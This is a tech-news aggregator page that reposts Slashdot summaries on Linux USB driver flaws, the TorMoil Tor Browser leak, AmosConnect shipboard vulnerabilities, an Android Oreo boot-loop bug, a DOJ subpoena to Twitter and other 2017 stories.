Tag: facebook

Linux Has a USB Driver Security Problem

Catalin Cimpanu, reporting for BleepingComputer: USB drivers included in the Linux kernel are rife with security flaws that in some cases can be exploited to run untrusted code and take over users’ computers. The vast majority of these vulnerabilities came to light on Monday, when Google security expert Andrey Konovalov informed the Linux community of 14 vulnerabilities he found in the Linux kernel USB subsystem. “All of them can be triggered with a crafted malicious USB device in case an attacker has physical access to the machine, ” Konovalov said. The 14 flaws are actually part of a larger list of 79 flaws Konovalov found in Linux kernel USB drivers during the past months. Not all of these 79 vulnerabilities have been reported, let alone patched. Most are simple DoS (Denial of Service) bugs that freeze or restart the OS, but some allow attackers to elevate privileges and execute malicious code. Read more of this story at Slashdot.

View article:
Linux Has a USB Driver Security Problem

Windows 10’s Version ofd AirDrop Lets You Quickly Share Files Between PCs

Microsoft is testing its “Near Share” feature of Windows 10 in the latest Insider build (17035) today, which will let Windows 10 PCs share documents or photos to PCs nearby via Bluetooth. The Verge reports: A new Near Share option will be available in the notification center, and the feature can be accessed through the main share function in Windows 10. Files will be shared wirelessly, and recipients will receive a notification when someone is trying to send a file. Microsoft’s addition comes just a day after Google unveiled its own AirDrop-like app for Android. Read more of this story at Slashdot.

View article:
Windows 10’s Version ofd AirDrop Lets You Quickly Share Files Between PCs

TorMoil Vulnerability Leaks Real IP Address From Tor Browser Users; Security Update Released

Catalin Cimpanu, reporting for BleepingComputer: The Tor Project has released a security update for the Tor Browser on Mac and Linux to fix a vulnerability that leaks users’ real IP addresses. The vulnerability was spotted by Filippo Cavallarin, CEO of We Are Segment, an Italian company specialized in cyber-security and ethical hacking. Cavallarin privately reported the issue — which he codenamed TorMoil — to the Tor Project last week. Tor Project developers worked with the Firefox team (Tor Browser is based on the Firefox browser) to release a fix. Today, the Tor team released version 7.0.9 to address the vulnerability. Tor Browser 7.0.9 is only available for Mac and Linux users. Tor Browser on Windows is not affected. Read more of this story at Slashdot.

Visit link:
TorMoil Vulnerability Leaks Real IP Address From Tor Browser Users; Security Update Released

Another Million Subscribers Cut the Pay TV Cord Last Quarter

A report from FierceCable says that a million more U.S. pay TV subscribers cut the TV cord last quarter. “Only five of the seven biggest pay TV providers have released their third quarter subscriber data, but collectively these companies saw a net loss of 632, 000 pay TV subscribers during the period (385, 000 for AT&T and DirecTV, 125, 000 for Comcast, 104, 000 for Charter, 18.000 for Verizon FiOS TV), ” reports DSLReports. “Dish has yet to report its own cord cutting tallies, but the company is again expected to be among the hardest hit due to a high level of retransmission fee feuds and a lack of broadband bundles.” Read more of this story at Slashdot.

Read the original post:
Another Million Subscribers Cut the Pay TV Cord Last Quarter

Android Oreo Bug Sends Thousands of Phones Into Infinite Boot Loops

An anonymous reader writes: A bug in the new “Adaptive Icons” feature introduced in Android Oreo has sent thousands of phones into infinite boot loops, forcing some users to reset their devices to factory settings, causing users to lose data along the way. The bug was discovered by Jcbsera, the developer of the Swipe for Facebook Android app (energy-efficient Facebook wrapper app), and does not affect Android Oreo (8.0) in its default state. The bug occurs only with apps that use adaptive icons — a new feature introduced in Android Oreo that allows icons to change shape and size based on the device they’re viewed on, or the type of launcher the user is using on his Android device. For example, adaptive icons will appear in square, rounded, or circle containers depending on the theme or launcher the user is using. The style of adaptive icons is defined a local XML file. The bug first manifested itself when the developer of the Swipe for Facebook Android app accidentally renamed the foreground image of his adaptive icon with the same name as this XML file (ic_launcher_main.png and ic_launcher_main.xml). This naming scheme sends Android Oreo in an infinite loop that regularly crashes the device. At one point, Android detects something is wrong and prompts the user to reset the device to factory settings. Users don’t have to open an app, and the crashes still happen just by having an app with malformed adaptive icons artifacts on your phone. Google said it will fix the issue in Android Oreo 8.1. Read more of this story at Slashdot.

Original post:
Android Oreo Bug Sends Thousands of Phones Into Infinite Boot Loops

After 12 Years, Mozilla Kills ‘Firebug’ Dev Tool

An anonymous reader quotes InfoWorld: The Firebug web development tool, an open source add-on to the Firefox browser, is being discontinued after 12 years, replaced by Firefox Developer Tools. Firebug will be dropped with next month’s release of Firefox Quantum (version 57). The Firebug tool lets developers inspect, edit, and debug code in the Firefox browser as well as monitor CSS, HTML, and JavaScript in webpages. It still has more than a million people using it, said Jan Honza Odvarko, who has been the leader of the Firebug project. Many extensions were built for Firebug, which is itself is an extension to Firefox… The goal is to make debugging native to Firefox. “Sometimes, it’s better to start from scratch, which is especially true for software development, ” Odvarko said. Read more of this story at Slashdot.

Read this article:
After 12 Years, Mozilla Kills ‘Firebug’ Dev Tool

Samsung Made a Bitcoin Mining Rig Out of 40 Old Galaxy S5s

An anonymous reader quotes a report from Motherboard: Samsung is starting a new “Upcycling” initiative that is designed to turn old smartphones and turn them into something brand new. Behold, for example, this bitcoin mining rig, made out of 40 old Galaxy S5 devices, which runs on a new operating system Samsung has developed for its upcycling initiative. Samsung premiered this rig, and a bunch of other cool uses for old phones, at its recent developer’s conference in San Francisco. Upcycling involves repurposing old devices instead of breaking them down for parts of reselling them. The people at Samsung’s C-Lab — an engineering team dedicated to creative projects — showed off old Galaxy phones and assorted tablets stripped of Android software and repurposed into a variety of different objects. The team hooked 40 old Galaxy S5’s together to make a bitcoin mining rig, repurposed an old Galaxy tablet into a ubuntu-powered laptop, used a Galaxy S3 to monitor a fishtank, and programed an old phone with facial recognition software to guard the entrance of a house in the form of an owl. Samsung declined to answer specific questions about the bitcoin mining rig, but an information sheet at the developer’s conference noted that eight galaxy S5 devices can mine at a greater power efficiency than a standard desktop computer (not that too many people are mining bitcoin on their desktops these days). Read more of this story at Slashdot.

Read More:
Samsung Made a Bitcoin Mining Rig Out of 40 Old Galaxy S5s

Critical Flaws In Maritime Communications System Could Endanger Entire Ships

Orome1 shares a report from Help Net Security: IOActive security consultant Mario Ballano has discovered two critical cybersecurity vulnerabilities affecting Stratos Global’s AmosConnect communication shipboard platform. The platform works in conjunction with the ships’ satellite equipment, and integrates vessel and shore-based office applications, as well as provides services like Internet access for the crew, email, IM, position reporting, etc. The first vulnerability is a blind SQL injection in a login form. Attackers that successfully exploit it can retrieve credentials to log into the service and access sensitive information stored in it. The second one is a built-in backdoor account with full system privileges. “Among other things, this vulnerability allows attackers to execute commands with SYSTEM privileges on the remote system by abusing AmosConnect Task Manager, ” Bellano shared. The found flaws can be exploited only by an attacker that has access to the ship’s IT systems network, he noted, but on some ships the various networks might not be segmented, or AmosConnect might be exposed to one or more of them. The vulnerabilities were found in AmosConnect 8.4.0, and Stratos Global was notified a year ago. But Inmarsat won’t fix them, and has discontinued the 8.0 version of the platform in June 2017. Read more of this story at Slashdot.

More:
Critical Flaws In Maritime Communications System Could Endanger Entire Ships

Justice Department Demands Five Twitter Users’ Personal Info Over an Emoji

An anonymous reader quotes a report from Techdirt: Back in May, the Justice Department — apparently lacking anything better to do with its time — sent a subpoena to Twitter, demanding a whole bunch of information on five Twitter users, including a few names that regular Techdirt readers may be familiar with. If you can’t see that, it’s a subpoena asking for information on the following five Twitter users: @dawg8u (“Mike Honcho”), @abtnatural (“Virgil”), @Popehat (Ken White), @associatesmind (Keith Lee) and @PogoWasRight (Dissent Doe). I’m pretty sure we’ve talked about three of those five in previous Techdirt posts. Either way, they’re folks who are quite active in legal/privacy issues on Twitter. And what info does the DOJ want on them? Well, basically everything: [users’ names, addresses, IP addresses associated with their time on Twitter, phone numbers and credit card or bank account numbers.] That’s a fair bit of information. Why the hell would the DOJ want all that? Would you believe it appears to be over a single tweet from someone to each of those five individuals that consists entirely of a smiley face? I wish I was kidding. Here’s the tweet and then I’ll get into the somewhat convoluted back story. The tweet is up as I write this, but here’s a screenshot in case it disappears. The Department of Justice’s subpoena is intended to address allegations that Shafer, who has a history of spotting weak encryption and drawing attention to it, cyberstalked an FBI agent after the agency raided his home. Vanity Fair summarizes the incident: “In 2013, Shafer discovered that FairCom’s data-encryption package had actually exposed a dentist’s office to data theft. An F.T.C. settlement later validated Shafer’s reporting, but in 2016, when another dentist’s office responded to Shafer’s disclosure by claiming he’d violated the Computer Fraud and Abuse Act and broken the law, the F.B.I. raided his home and confiscated many of his electronics. Shafer was particularly annoyed at F.B.I. Special Agent Nathan Hopp, who helped to conduct the raid, and who was later involved in a different case: in March, he compiled a criminal complaint involving the F.B.I.’s arrest of a troll for tweeting a flashing GIF at journalist Kurt Eichenwald, who is epileptic. Shafer began to compile publicly available information about Hopp, sharing his findings on Twitter. The Twitter users named in the subpoena had started a separate discussion about Hopp, with one user calling Hopp the “least busy F.B.I. agent of all time, ” a claim that prompted Shafer’s smiley-faced tweet.” Read more of this story at Slashdot.

Read the article:
Justice Department Demands Five Twitter Users’ Personal Info Over an Emoji

WeWork Employees Caught Spying on Competition

An anonymous reader shares a report: The battle in the red-hot co-working space business is heating up. WeWork, the No. 1 player in the sector, allegedly sent two spies to infiltrate rival Knotel — to steal info and some customers, Knotel claimed. The spies showed up at seven Knotel properties in Manhattan last month in a “systematic attempt to pilfer Knotel’s proprietary information and trade secrets, ” according to a cease-and-desist letter the smaller company sent to WeWork. The Post has obtained a copy of the letter. The corporate espionage rookies may have pulled off the caper except, in a totally random happening, a Knotel employee recognized one of them as a friend of a friend, according to sources close to Knotel. While the pair used fake names to gain entry, according to the letter, a call to the Knotel worker’s pal got the spy’s real name — and a couple of social media inquiries turned up the fact that he worked for rival WeWork, sources said. The letter to WeWork asks for a reply by Oct. 13 — but so far Knotel hasn’t heard a peep from its rival, according to CEO Amol Sarva. While inside the Knotel offices, visited Sept. 12-14, the luckless spies posed “as the founders of a fast-growing startup” and said they needed space for their six-person company, according to the letter. Read more of this story at Slashdot.

See more here:
WeWork Employees Caught Spying on Competition